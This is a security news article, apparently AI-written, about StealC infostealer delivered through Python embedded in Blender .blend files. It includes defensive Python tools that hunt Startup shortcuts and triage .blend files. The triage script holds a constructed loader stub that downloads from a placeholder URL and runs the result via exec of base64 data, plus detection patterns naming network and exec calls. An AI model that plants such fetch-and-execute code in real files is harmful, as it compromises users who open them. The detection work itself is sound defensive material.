

Ethical Hacking News

A Tangled Web of Malice: How StealC Infostealing Malware Hides Within Blender 3D Model Files


Malicious Blender model files have been found to deliver StealC, an infostealer that harvests credentials and data from browsers, cryptocurrency wallets, messaging clients and other applications.

  • Attackers are abusing Blender's support for Python embedded in .blend files; this is a feature of the format, not a software vulnerability in Blender.
  • Blender's Auto Run Python Scripts preference, when enabled, executes that embedded code as soon as the file is opened.
  • The current campaign uses malicious .blend files whose embedded Python fetches a loader from a Cloudflare Workers domain; the loader then pulls two ZIP archives from attacker-controlled IP addresses.
  • The final payload is a recent variant of the StealC infostealer, which exfiltrates data from many platforms and includes an updated UAC bypass.
  • Blender users should treat assets from marketplaces that do not vet uploads, CGTrader included, as executables: keep Auto Run disabled and open unknown files only in a sandboxed environment.



  • 3D modeling has long been a haven for creativity, but like any digital workflow it faces the same threats as everything else. A recent campaign shows an attacker embedding Python code in Blender model files and distributing them through CGTrader, a leading marketplace for 3D models. This is an abuse of a Blender feature rather than a software vulnerability: a .blend file can legitimately carry Python, and Blender will run it if the user allows it.

    Blender, the open-source 3D suite, lets a .blend file carry Python text datablocks and Python driver expressions so that rigs, facial controls and custom UI panels work as soon as the file loads. Whether that code executes is governed by the Auto Run Python Scripts preference (Preferences > Save & Load). It is off by default; Blender then warns that the file contains scripts and leaves them unexecuted unless the user clicks Allow Execution. Many artists switch Auto Run on permanently because their rigs depend on it, and that one setting turns every untrusted .blend into a code-execution vector.

    Researchers at Morphisec, who have been tracking the campaign, describe the chain as follows: the malicious .blend file contains embedded Python that downloads a loader from a Cloudflare Workers domain; the loader retrieves two ZIP archives, ZalypaGyliveraV1 and BLENDERX, from attacker-controlled IP addresses; the archives are unpacked into the %TEMP% folder, and LNK files are dropped into the Startup directory so the payload runs again at every logon.
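    The persistence step described above (shortcuts in the Startup folder pointing at files unpacked under %TEMP%) is something a responder can hunt for directly. The following is an added example written for this page, not code from Morphisec, BleepingComputer or the Blender project. It parses just enough of the Windows Shell Link format (the 76-byte header, LinkInfo's local base path and the StringData fields) to recover a shortcut's target, working directory and arguments, then flags any that reference a temp directory or launch a script interpreter. The user name, paths and the sample shortcut are constructed for the example; the ANSI path is decoded as cp1252, which is an assumption about the system codepage.

```python
"""Hunt Startup-folder shortcuts whose target or working directory lives in %TEMP%."""
import re
import struct
from pathlib import Path
from typing import Dict, Iterable, List, Optional

# MS-SHLLINK LinkFlags bits used here and the ShellLink CLSID {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
INTERPRETERS = {"python.exe", "pythonw.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def parse_lnk(data: bytes) -> Dict[str, Optional[str]]:
    """Read the header, LinkInfo's ANSI LocalBasePath and the StringData fields of a .lnk."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_IDLIST:                          # skip the LinkTargetIDList (uint16 size + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = None
    if flags & HAS_LINKINFO:
        info_size, _hdr_size, info_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if info_flags & 0x1:                        # VolumeIDAndLocalBasePath: a local path is present
            end = data.index(b"\0", pos + base_off)
            target = data[pos + base_off:end].decode("cp1252", "replace")  # assumes Western ANSI codepage
        pos += info_size

    def read_string() -> str:                       # StringData item: uint16 char count, then characters
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")

    out: Dict[str, Optional[str]] = {"target": target}
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_RELPATH), ("working_dir", HAS_WORKDIR),
                     ("arguments", HAS_ARGS), ("icon", HAS_ICON)):   # StringData order is fixed by the spec
        out[key] = read_string() if flags & bit else None
    return out


def _expand(value: Optional[str], env: Dict[str, str]) -> str:
    """Expand %VAR% references against the supplied environment and normalise for comparison."""
    value = re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), value or "")
    return value.replace("/", "\\").lower().rstrip("\\")


def assess_lnk(info: Dict[str, Optional[str]], env: Dict[str, str]) -> List[str]:
    """Return the reasons a shortcut looks like dropped persistence; an empty list means clean."""
    temp_dirs = {_expand(env[k], env) for k in ("TEMP", "TMP") if k in env}
    if "LOCALAPPDATA" in env:
        temp_dirs.add(_expand(env["LOCALAPPDATA"] + r"\Temp", env))
    reasons = []
    for field in ("target", "working_dir", "arguments"):
        value = _expand(info.get(field), env)
        if any(t and t in value for t in temp_dirs):
            reasons.append(f"{field} references a temp directory")
    if _expand(info.get("target"), env).rsplit("\\", 1)[-1] in INTERPRETERS:
        reasons.append("target is a script interpreter")
    return reasons


def hunt_startup(folders: Iterable[Path], env: Dict[str, str]) -> List[Dict[str, object]]:
    """Parse every .lnk in the given Startup folders and keep the ones assess_lnk flags."""
    hits = []
    for folder in folders:
        folder = Path(folder)
        if not folder.is_dir():
            continue
        for lnk in folder.glob("*.lnk"):
            try:
                info = parse_lnk(lnk.read_bytes())
            except ValueError:
                continue
            reasons = assess_lnk(info, env)
            if reasons:
                hits.append({"shortcut": str(lnk), "target": info["target"], "reasons": reasons})
    return hits


def build_sample_lnk(target: str, arguments: str, working_dir: str) -> bytes:
    """Constructed sample shortcut: LinkInfo with a local path, Unicode working dir and arguments."""
    volume = struct.pack("<IIII", 0x11, 3, 0x1234ABCD, 0x10) + b"\0"   # DRIVE_FIXED, empty label
    base = target.encode("cp1252") + b"\0"
    size = 0x1C + len(volume) + len(base) + 1
    link_info = struct.pack("<IIIIIII", size, 0x1C, 1, 0x1C, 0x1C + len(volume), 0,
                            0x1C + len(volume) + len(base)) + volume + base + b"\0"
    flags = HAS_LINKINFO | HAS_WORKDIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + link_info + string(working_dir) + string(arguments)
```

    On a live host, call hunt_startup with the per-user folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) and the all-users folder (%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup) and pass dict(os.environ) as the environment. The parser deliberately ignores the LinkTargetIDList, so a shortcut that carries only an ID list and no LinkInfo yields a target of None; treat those as worth a manual look rather than as clean.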

    The final payload is the latest variant of the StealC infostealer. StealC is notable for the breadth of what it steals: data from more than 23 browsers, numerous cryptocurrency wallet browser extensions and desktop apps, Telegram, Discord, Tox, Pidgin, VPN clients (ProtonVPN, OpenVPN) and mail clients (Thunderbird). This variant also carries an updated UAC bypass.

    Although StealC has been documented since 2023, recent builds still slip past anti-virus products: Morphisec notes that no engine on VirusTotal detected the variant it analyzed at the time. Detection of the stealer binary therefore cannot be relied on; the .blend file itself and the artifacts it drops are the better places to look.

    Blender users should treat assets downloaded from marketplaces that do not vet uploads, CGTrader included, with the same suspicion as an executable, because a .blend file can carry code. Keep Auto Run Python Scripts disabled, open files from unknown publishers only in a sandboxed or isolated environment, and extend trust only to publishers whose assets you have reason to trust.
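    Treating a .blend file as an executable means inspecting it before Blender gets to run it. The following is an added example for this page, not code from Morphisec, BleepingComputer or the Blender project. It walks the .blend file-block list (classic 12-byte header, as used through Blender 4.x), counts Text datablocks, recovers their lines from the DATA blocks that follow each one, and string-scans every DATA block for tokens a loader needs (network, exec, base64, shortcut and Startup references), which also covers Python driver expressions stored outside Text datablocks. Assumptions: gzip-compressed saves are handled via the standard library, zstd-compressed saves must be decompressed first, and the SDNA is not parsed, so the Text block's Register flag and name are not read. The sample file and the loader stub it contains are constructed here; the URL is a placeholder, not a real indicator.

```python
"""Triage a .blend file for embedded Python without opening it in Blender."""
import gzip
import re
import struct
from typing import Dict, Iterator, List, Tuple

# Tokens a loader script or driver expression needs but a legitimate rig almost never does.
SUSPICIOUS = re.compile(
    rb"urllib|requests|socket|subprocess|os\.system|os\.popen|exec\(|eval\(|"
    rb"base64|ctypes|winreg|tempfile|\.lnk|Startup|https?://|[A-Za-z0-9+/]{40,}={0,2}"
)
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e\t]{4,}")


def _raw_blend(data: bytes) -> bytes:
    """Undo gzip wrapping and validate the classic 12-byte header used through Blender 4.x."""
    if data[:2] == b"\x1f\x8b":                    # older Blender versions gzip the whole file
        data = gzip.decompress(data)
    if data[:4] == b"\x28\xb5\x2f\xfd":            # Blender 3.0+ may use zstd instead
        raise ValueError("zstd-compressed .blend: decompress it first (e.g. `zstd -d`)")
    if data[:7] != b"BLENDER" or data[7:8] not in (b"-", b"_") or data[8:9] not in (b"v", b"V"):
        raise ValueError("not a .blend file, or a header variant this parser does not handle")
    return data


def iter_blocks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (block code, payload) for every file block up to ENDB."""
    data = _raw_blend(data)
    ptr = "Q" if data[7:8] == b"-" else "I"       # '-' = 8-byte pointers, '_' = 4-byte
    endian = "<" if data[8:9] == b"v" else ">"     # 'v' = little-endian, 'V' = big-endian
    # Block header: code[4], int32 size, pointer-sized old address, int32 SDNA index, int32 count
    header = struct.Struct(f"{endian}4si{ptr}ii")
    pos = 12
    while pos + header.size <= len(data):
        code, size, _old_addr, _sdna, _count = header.unpack_from(data, pos)
        pos += header.size
        if code == b"ENDB":
            return
        if size < 0 or pos + size > len(data):
            raise ValueError(f"truncated block {code!r} at offset {pos}")
        yield code, data[pos:pos + size]
        pos += size
    raise ValueError("file ended without an ENDB block")


def scan_blend(data: bytes) -> Dict[str, object]:
    """Count Text datablocks, recover their lines, and flag suspicious strings in any DATA block."""
    text_blocks, script_lines, suspicious = 0, [], []
    in_text = False                                # True while walking the DATA blocks of a TX datablock
    for code, payload in iter_blocks(data):
        if code[:2] == b"TX":                      # ID code of a Text datablock
            text_blocks += 1
            in_text = True
            continue
        if code != b"DATA":                        # any other block ends the Text's run of DATA
            in_text = False
            continue
        for run in PRINTABLE_RUN.findall(payload):
            line = run.decode("ascii")
            if in_text:                            # each TextLine's characters sit in their own DATA block
                script_lines.append(line)
            hit = SUSPICIOUS.search(run)           # driver expressions live in DATA blocks too
            if hit:
                suspicious.append((hit.group().decode("ascii"), line))
    return {"text_blocks": text_blocks, "script_lines": script_lines, "suspicious": suspicious}


def _block(code: bytes, payload: bytes) -> bytes:
    """64-bit little-endian block header with a dummy old address (sample builder only)."""
    return struct.pack("<4siQii", code, len(payload), 0x7F0000001000, 0, 1) + payload


def build_sample_blend(script_lines: List[str], compress: bool = False) -> bytes:
    """Constructed sample: a minimal synthetic .blend with one Text datablock, not a real Blender save."""
    parts = [b"BLENDER-v404", _block(b"GLOB", b"\0" * 32), _block(b"TX\0\0", b"\0" * 64)]
    for line in script_lines:
        parts.append(_block(b"DATA", b"\0" * 40))              # stand-in for the TextLine struct
        parts.append(_block(b"DATA", line.encode() + b"\0"))   # the line's characters, NUL-terminated
    parts += [_block(b"OB\0\0", b"\0" * 16), _block(b"ENDB", b"")]
    raw = b"".join(parts)
    return gzip.compress(raw) if compress else raw


# Constructed stand-in for the campaign's first stage; the URL is a placeholder, not a real indicator.
LOADER_STUB = [
    "import base64, subprocess, urllib.request",
    "raw = urllib.request.urlopen('https://loader.example.invalid/stage1').read()",
    "exec(base64.b64decode(raw))",
]

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_blend(LOADER_STUB)
    report = scan_blend(data)
    print(f"Text datablocks: {report['text_blocks']}, suspicious strings: {len(report['suspicious'])}")
    for token, line in report["suspicious"]:
        print(f"  [{token}] {line}")
```

    Run it as `python blend_triage.py model.blend` on a downloaded asset before opening it. A Text datablock is not proof of malice (many rigs ship helper scripts), but a Text datablock whose lines reach out to the network, decode base64 or touch the Startup folder is, and any such file should only ever be opened with Auto Run disabled inside a sandbox.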

    This campaign is a reminder that any file format able to carry executable code, however creative its usual purpose, deserves the same vigilance as a downloaded program.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/A-Tangled-Web-of-Malice-How-StealC-Infostealing-Malware-Hides-Within-Blender-3D-Model-Files-ehn.shtml

  • https://www.bleepingcomputer.com/news/security/malicious-blender-model-files-deliver-stealc-infostealing-malware/


  • Published: Mon Nov 24 16:07:18 2025 by llama3.2 3B Q4_K_M
    © Ethical Hacking News . All rights reserved.
